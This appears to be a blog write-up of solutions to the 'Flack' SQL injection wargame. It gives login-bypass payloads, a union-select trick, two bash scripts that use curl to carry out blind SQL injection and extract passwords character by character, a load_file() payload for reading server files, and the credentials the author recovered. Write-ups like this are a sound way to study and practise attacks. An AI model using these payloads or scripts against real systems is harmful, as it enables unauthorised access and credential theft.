# Flack wargame

Location

.::|[ FLACK ]|::.

Login bypass

- Level 1

' or 1=1 #
level1

or

' or '1'='1
' or '1'='1

- Level 2

' or 1=1) #
level2

or

' or '1'='1
' or '1'='1

- Level 3

admin') #
level3

- Level 4

# cat bypass-level4.sh 
#!/bin/bash

url='http://flack.hkpco.kr/login/level4/index.php'
string='Mail server error'
pass=""

for length in `seq 1 50`; do
 match=`curl -s -F "fuser=johnwayne' and length(pass)=$length #" $url | grep "$string"`
 if [ "$match" != "" ]; then break; fi
done
echo "Password length = $length"

for i in `seq 1 $length`; do
 for char in {{a..z},{0..9},{A..Z}}; do 
  match=`curl -s -F "fuser=johnwayne' and substring(pass,$i,1)='$char" $url | grep "$string"`
  if [ "$match" != "" ]; then break; fi
 done
 pass="$pass$char"
 echo "pass[$i]='$char'"
done

echo "pass='$pass'"

johnwayne
drjgxpp

- Level 5

' union select md5('level5') #
level5

Other/Blind

- Level 1

http://flack.hkpco.kr/other/level1/members.php?uid=1 or id>1 order by name
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by password
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by pass
http://flack.hkpco.kr/other/level1/members.php?uid=4 and length(pass)=1

# cat other-level1.sh
#!/bin/bash

url='http://flack.hkpco.kr/other/level1/members.php?uid=4'
string='jumper'
pass=""

for length in `seq 1 50`; do
 match=`curl -s "$url and length(pass)=$length" | grep "$string"`
 if [ "$match" != "" ]; then break; fi
done
echo "Password length = $length"

for i in `seq 1 $length`; do
 for char in {{a..z},{0..9},{A..Z}}; do
  decimal=`echo -n $char | od -An -d | tr -d ' '`
  match=`curl -s "$url and substring(pass,$i,1)=char($decimal)" | grep "$string"`
  if [ "$match" != "" ]; then break; fi
 done
 pass="$pass$char"
 echo "pass[$i]='$char'"
done

echo "pass='$pass'"

jumper
mehijo123

- Level 3

http://flack.hkpco.kr/style.css

# echo -n /tmp/a000.temp | od -t x1 -An | sed 's/ /,0x/g'
# echo -n /tmp/a000.temp | od -An -t u1 | sed 's/  / /g' | tr ' ' ','

select load_file(char(0x2f,0x74,0x6d,0x70,0x2f,0x61,0x30,0x30,0x30,0x2e,0x74,0x65,0x6d,0x70));

or

select load_file(char(47,116,109,112,47,97,48,48,48,46,116,101,109,112));

batman
skoda>batmobile
Posted by t0n1
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)